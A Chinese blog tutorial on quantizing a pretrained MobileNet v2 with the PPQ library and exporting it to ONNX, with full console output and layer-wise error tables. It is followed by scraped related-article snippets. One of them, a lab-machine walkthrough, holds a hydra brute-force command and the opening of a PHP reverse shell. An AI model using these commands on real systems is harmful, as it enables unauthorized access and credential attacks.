2.1 ppq量化pytorch->onnx

前言

torchvision中加载一个模型,转换为 onnx 格式、导出 quantized graph.

code

from typing import Iterableimport torch
import torchvision
from torch.utils.data import DataLoaderfrom ppq import BaseGraph, QuantizationSettingFactory, TargetPlatform
from ppq.api import export_ppq_graph, quantize_torch_modelBATCHSIZE = 32
INPUT_SHAPE = [3, 224, 224]
DEVICE = 'cuda' # only cuda is fully tested :(  For other executing device there might be bugs.
PLATFORM = TargetPlatform.PPL_CUDA_INT8  # identify a target platform for your network.def load_calibration_dataset() -> Iterable:return [torch.rand(size=INPUT_SHAPE) for _ in range(32)]def collate_fn(batch: torch.Tensor) -> torch.Tensor:return batch.to(DEVICE)# Load a pretrained mobilenet v2 model
model = torchvision.models.mobilenet.mobilenet_v2(pretrained=True)
model = model.to(DEVICE)# create a setting for quantizing your network with PPL CUDA.
quant_setting = QuantizationSettingFactory.pplcuda_setting()
quant_setting.equalization = True # use layerwise equalization algorithm.
quant_setting.dispatcher   = 'conservative' # dispatch this network in conservertive way.# Load training data for creating a calibration dataloader.
calibration_dataset = load_calibration_dataset()
calibration_dataloader = DataLoader(dataset=calibration_dataset,batch_size=BATCHSIZE, shuffle=True)# quantize your model.
quantized = quantize_torch_model(model=model, calib_dataloader=calibration_dataloader,calib_steps=32, input_shape=[BATCHSIZE] + INPUT_SHAPE,setting=quant_setting, collate_fn=collate_fn, platform=PLATFORM,onnx_export_file='./onnx.model', device=DEVICE, verbose=0)# Quantization Result is a PPQ BaseGraph instance.
assert isinstance(quantized, BaseGraph)# export quantized graph.
export_ppq_graph(graph=quantized, platform=PLATFORM,graph_save_to='./quantized(onnx).onnx',config_save_to='./quantized(onnx).json')# analyse quantization error brought in by every layer
from ppq.quantization.analyse import layerwise_error_analyse, graphwise_error_analyse
graphwise_error_analyse(graph=quantized, # ppq ir graphrunning_device=DEVICE, # cpu or cudamethod='snr',  # the metric is signal noise ratio by default, adjust it to 'cosine' if that's desiredsteps=32, # how many batches of data will be used for error analysisdataloader=calibration_dataloader,collate_fn=lambda x: x.to(DEVICE)
)layerwise_error_analyse(graph=quantized,running_device=DEVICE,method='snr',  # the metric is signal noise ratio by default, adjust it to 'cosine' if that's desiredsteps=32,dataloader=calibration_dataloader,collate_fn=lambda x: x.to(DEVICE)
)

结果

加载预训练的mobilenet v2 model
最终生成三个文件信息

# python eaxmple.py ____  ____  __   ____                    __              __/ __ \/ __ \/ /  / __ \__  ______ _____  / /_____  ____  / // /_/ / /_/ / /  / / / / / / / __ `/ __ \/ __/ __ \/ __ \/ // ____/ ____/ /__/ /_/ / /_/ / /_/ / / / / /_/ /_/ / /_/ / //_/   /_/   /_____\___\_\__,_/\__,_/_/ /_/\__/\____/\____/_/[07:04:00] PPQ Layerwise Equalization Pass Running ... 2 equalization pair(s) was found, ready to run optimization.
Layerwise Equalization: 100%|█████████████████████████████████████████████████████████| 10/10 [00:00<00:00, 1274.01it/s]
Finished.
[07:04:00] PPQ Quantization Config Refine Pass Running ... Finished.
[07:04:00] PPQ Quantization Fusion Pass Running ...        Finished.
[07:04:00] PPQ Quantize Point Reduce Pass Running ...      Finished.
[07:04:00] PPQ Parameter Quantization Pass Running ...     Finished.
Calibration Progress(Phase 1): 100%|████████████████████████████████████████████████████| 32/32 [01:59<00:00,  3.74s/it]
[07:04:00] PPQ Runtime Calibration Pass Running ...        Finished.
[07:06:00] PPQ Quantization Alignment Pass Running ...     Finished.
[07:06:00] PPQ Passive Parameter Quantization Running ...  Finished.
[07:06:00] PPQ Parameter Baking Pass Running ...           Finished.
--------- Network Snapshot ---------
Num of Op:                    [100]
Num of Quantized Op:          [100]
Num of Variable:              [277]
Num of Quantized Var:         [277]
------- Quantization Snapshot ------
Num of Quant Config:          [386]
BAKED:                        [53]
OVERLAPPED:                   [125]
SLAVE:                        [20]
ACTIVATED:                    [65]
PASSIVE_BAKED:                [53]
FP32:                         [70]
Network Quantization Finished.
Analysing Graphwise Quantization Error(Phrase 1):: 100%|██████████████████████████████████| 1/1 [00:00<00:00,  8.19it/s]
Analysing Graphwise Quantization Error(Phrase 2):: 100%|██████████████████████████████████| 1/1 [00:00<00:00,  6.84it/s]
Layer     | NOISE:SIGNAL POWER RATIO 
Conv_8:   | ████████████████████ | 1.678653
Conv_26:  | ████████████████     | 1.313450
Conv_9:   | █████████████        | 1.087763
Conv_13:  | █████████████        | 1.074564
Conv_55:  | ████████████         | 0.991271
Conv_28:  | ██████████           | 0.857988
Conv_17:  | ████████             | 0.730895
Conv_154: | ████████             | 0.676669
Conv_22:  | ████████             | 0.659212
Conv_152: | ███████              | 0.618322
Conv_142: | ███████              | 0.582268
Conv_133: | ██████               | 0.534554
Conv_45:  | ██████               | 0.520580
Conv_51:  | █████                | 0.464549
Conv_144: | █████                | 0.441523
Conv_41:  | █████                | 0.414612
Conv_36:  | █████                | 0.411636
Conv_57:  | ████                 | 0.387930
Conv_113: | ████                 | 0.368550
Conv_148: | ████                 | 0.351853
Conv_123: | ████                 | 0.333928
Conv_104: | ████                 | 0.331407
Conv_134: | ███                  | 0.319796
Conv_4:   | ███                  | 0.309758
Conv_138: | ███                  | 0.274523
Conv_125: | ███                  | 0.272312
Conv_32:  | ███                  | 0.269519
Conv_94:  | ███                  | 0.255700
Conv_47:  | ███                  | 0.255035
Conv_129: | ███                  | 0.246983
Conv_18:  | ██                   | 0.222586
Conv_65:  | ██                   | 0.205310
Conv_162: | ██                   | 0.190181
Conv_84:  | ██                   | 0.189721
Conv_90:  | ██                   | 0.183772
Conv_96:  | ██                   | 0.181663
Conv_70:  | ██                   | 0.174435
Conv_163: | ██                   | 0.167765
Conv_115: | ██                   | 0.164749
Conv_100: | █                    | 0.152931
Conv_86:  | █                    | 0.150768
Conv_105: | █                    | 0.148656
Conv_80:  | █                    | 0.134689
Conv_109: | █                    | 0.131509
Conv_37:  | █                    | 0.124499
Conv_119: | █                    | 0.122543
Conv_74:  | █                    | 0.096819
Conv_76:  |                      | 0.072862
Conv_61:  |                      | 0.071023
Conv_0:   |                      | 0.067830
Conv_66:  |                      | 0.064776
Gemm_169: |                      | 0.035677
Conv_158: |                      | 0.032427
Analysing Layerwise quantization error:: 100%|██████████████████████████████████████████| 53/53 [00:01<00:00, 34.86it/s]
Layer     | NOISE:SIGNAL POWER RATIO 
Conv_4:   | ████████████████████ | 0.007448
Conv_22:  | ███                  | 0.001254
Conv_133: | ███                  | 0.000973
Conv_142: | █                    | 0.000488
Conv_152: | █                    | 0.000487
Conv_162: | █                    | 0.000420
Conv_104: | █                    | 0.000372
Conv_8:   | █                    | 0.000269
Conv_65:  | █                    | 0.000214
Conv_113: | █                    | 0.000204
Conv_123: | █                    | 0.000190
Conv_13:  |                      | 0.000183
Conv_41:  |                      | 0.000142
Conv_17:  |                      | 0.000136
Conv_26:  |                      | 0.000113
Conv_36:  |                      | 0.000108
Conv_70:  |                      | 0.000096
Conv_94:  |                      | 0.000092
Conv_109: |                      | 0.000078
Conv_100: |                      | 0.000068
Conv_125: |                      | 0.000066
Conv_119: |                      | 0.000065
Gemm_169: |                      | 0.000064
Conv_55:  |                      | 0.000060
Conv_84:  |                      | 0.000058
Conv_138: |                      | 0.000053
Conv_80:  |                      | 0.000051
Conv_28:  |                      | 0.000050
Conv_45:  |                      | 0.000043
Conv_57:  |                      | 0.000036
Conv_90:  |                      | 0.000034
Conv_105: |                      | 0.000032
Conv_32:  |                      | 0.000032
Conv_144: |                      | 0.000031
Conv_74:  |                      | 0.000027
Conv_96:  |                      | 0.000027
Conv_115: |                      | 0.000026
Conv_154: |                      | 0.000026
Conv_51:  |                      | 0.000024
Conv_0:   |                      | 0.000023
Conv_148: |                      | 0.000022
Conv_86:  |                      | 0.000021
Conv_134: |                      | 0.000021
Conv_66:  |                      | 0.000018
Conv_18:  |                      | 0.000015
Conv_76:  |                      | 0.000012
Conv_129: |                      | 0.000010
Conv_47:  |                      | 0.000009
Conv_61:  |                      | 0.000008
Conv_9:   |                      | 0.000006
Conv_163: |                      | 0.000005
Conv_37:  |                      | 0.000004
Conv_158: |                      | 0.000002

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/125785.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

代碼隨想錄算法訓練營|第五十五天|1143.最长公共子序列、1035.不相交的线、53. 最大子序和。刷题心得(c++)

讀題 1143.最长公共子序列 自己看到题目的第一想法 看起來跟最長重複子数組很類似&#xff0c;但是要怎麼去推遞推的狀態沒有想法 看完代码随想录之后的想法 看完之後&#xff0c;大概釐清了整體想法&#xff0c;可以想成說&#xff0c;因為我們要考慮的是不連續的子序列&…

Jetpack:025-Jetpack中的多点触控事件

文章目录 1. 概念介绍2. 使用方法2.1 缩放事件2.2 旋转事件2.3 平移事件2.4 综合事件 3. 示例代码4. 内容总结 我们在上一章回中介绍了Jetpack中滚动事件相关的内容&#xff0c;本章回中主要介绍 多点解控事件。闲话休提&#xff0c;让我们一起Talk Android Jetpack吧&#xf…

尚硅谷-kubernetes

目录 一、kubernetes概述1、kubernetes基本介绍**2、kubernetes 功能和架构** 一、kubernetes概述 1、kubernetes基本介绍 kubernetes&#xff0c;简称 K8s&#xff0c;是用 8 代替 8 个字符“ubernete”而成的缩写 kubernetes是一个开源的&#xff0c;用于管理云平台中多个…

HTML基本概念:

HTML简介&#xff1a; 超文本标记语言&#xff08;英语&#xff1a;HyperText Markup Language&#xff0c;简称&#xff1a;HTML&#xff09;是一种用于创建网页的标准标记语言。 1&#xff09;、HTML 是用来描述网页的一种语言。 2&#xff09;、HTML 不是一种编程语言&am…

笔记本电脑搜索不到wifi6 无线路由器信号

路由器更换成wifi6 无线路由器后&#xff0c;手机能搜索到这个无线信号&#xff0c;但是笔记本搜索不到这个无线信号&#xff0c;后网上搜索后发现是无线网卡驱动问题&#xff0c;很多无线网卡使用的是Intel芯片&#xff0c;Intel就此发布了公告&#xff0c;升级驱动就可以彻底…

我和云栖有个约会

开端&#xff0c;似曾相识的云栖 2023年阿里云云栖大会在云栖小镇举办&#xff0c;云栖小镇&#xff1f;在2020年的时候&#xff0c;曾经来过这里参加竞赛。时隔三年&#xff0c;身份变换&#xff0c;以开发者的身份&#xff0c;收到阿里云开发者社区的邀请&#xff0c;正好有…

linux 报错

输入 pip install -U openmim报错 有可能是服务器在其他国家&#xff0c;需要手动设置 把这三行复制到~/.bashrc里 export http_proxyhttp://127.0.0.1:3128 export https_proxy${http_proxy} export ftp_proxy${http_proxy}source ~/.bashrc

第57篇-某钩招聘网站加密参数分析【2023-10-31】

声明:该专栏涉及的所有案例均为学习使用,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关!如有侵权,请私信联系本人删帖! 文章目录 一、前言二、网站分析1.X-S-HEADER参数2.请求参数data3.响应机密值data一、前言 网址: aHR0cHM6Ly93d3cubGFnb3UuY29t…

[NSSRound#6 Team]check(Revenge)

文章目录 考点tarfile文件覆盖漏洞&#xff08;CVE-2007-4559&#xff09;PIN码计算 解题过程非预期解预期解 考点 tarfile文件覆盖漏洞&#xff08;CVE-2007-4559&#xff09; Python 中 tarfile 模块中的extract、extractFile和extractall 函数中的目录遍历漏洞 允许 用户协…

`.NET Web`新人入门必学项目`EarthChat`

.NET Web新人入门必学项目EarthChat EarthChat是一个基于.NET 7的实战项目&#xff0c;EarthChat提供了很多的最佳实践&#xff0c;EarthChat的目标也是成为一个很多人都喜欢的大型聊天业务系统&#xff0c;并且将结合SKAI大模型进行打造智能业务系统&#xff0c;在EarthChat中…

Pytorch 文本情感分类案例

一共六个脚本,分别是: ①generateDictionary.py用于生成词典 ②datasets.py定义了数据集加载的方法 ③models.py定义了网络模型 ④configs.py配置一些参数 ⑤run_train.py训练模型 ⑥run_test.py测试模型 数据集https://download.csdn.net/download/Victor_Li_/88486959?spm1…

力扣707.设计链表

原题链接&#xff1a;力扣707.设计链表 全代码&#xff1a; class MyLinkedList { public:// 定义链表节点结构体struct LinkedNode {int val;LinkedNode* next;LinkedNode(int val):val(val), next(nullptr){}};// 初始化链表MyLinkedList() {_dummyHead new LinkedNode(0)…

narak靶机攻略

narak靶机攻略 扫描 渗透 cewl http://10.4.7.158 > use1.txthydra -L use1.txt -P use1.txt http-get://10.4.7.158/webdav -V -t 50 -fyamdoot:Swargcadaver http://10.4.7.158/webdav<?php $ip10.4.7.158; $port12138; $sock fsockopen($ip, $port); $descriptors…

识别flink的反压源头

背景 flink中最常见的问题就是反压&#xff0c;这种情况下我们要正确的识别导致反压的真正的源头&#xff0c;本文就简单看下如何正确识别反压的源头 反压的源头 首先我们必须意识到现实中轻微的反压是没有必要去优化的&#xff0c;因为这种情况下是由于偶尔的流量峰值,Task…

JavaScript的高级概述

还记得我们刚刚开始的时候给JavaScript的定义吗&#xff1f; JavaScript是一种高级的&#xff0c;面向对象的&#xff0c;多范式变成语言&#xff01; 这种定义JavaScript只是冰山一角&#xff01; JavaScript的高级定义 JavaScript是一种高级的、基于原型的、面向对象、多范…

网络协议--TCP的保活定时器

23.1 引言 许多TCP/IP的初学者会很惊奇地发现可以没有任何数据流通过一个空闲的TCP连接。也就是说&#xff0c;如果TCP连接的双方都没有向对方发送数据&#xff0c;则在两个TCP模块之间不交换任何信息。例如&#xff0c;没有可以在其他网络协议中发现的轮询。这意味着我们可以…

centos英伟达驱动安装

1、预安装操作 1.1. Verify You Have a CUDA-Capable GPU lspci | grep -i nvidia 1.2. Verify You Have a Supported Version of Linux uname -m && cat /etc/*release1.3. Verify the System Has gcc Installed gcc --version1.4. Verify the System…

Node.js的基本概念node -v 和npm -v 这两个命令的作用

Node.js 是一个开源且跨平台的 JavaScript 运行时环境&#xff0c;它可以让你在服务器端运行 JavaScript 代码。Node.js 使用了 Chrome 的 V8 JavaScript 引擎来执行代码&#xff0c;非常高效。 在 Node.js 出现之前&#xff0c;JavaScript 通常只在浏览器中运行&#xff0c;用…

第 369 场 LeetCode 周赛题解

A 找出数组中的 K-or 值 模拟 class Solution { public:int findKOr(vector<int> &nums, int k) {vector<int> cnt(32);for (auto x: nums)for (int i 0; i < 32; i)if (x >> i & 1)cnt[i];int res 0;for (int i 0; i < 32; i)if (cnt[i] &…

uniapp 开发微信小程序 v-bind给子组件传递函数,该函数中的this不是父组件的二是子组件的this

解决办法&#xff1a;子组件通过缓存子组件this然后&#xff0c;用bind改写this 这个方法因为定义了全局变量that 那么该变量就只能用一次&#xff0c;不然会有赋值覆盖的情况。 要么就弃用v-bind传入函数,改为emit传入自定义事件 [uniapp] uview(1.x) 二次封装u-navbar 导致…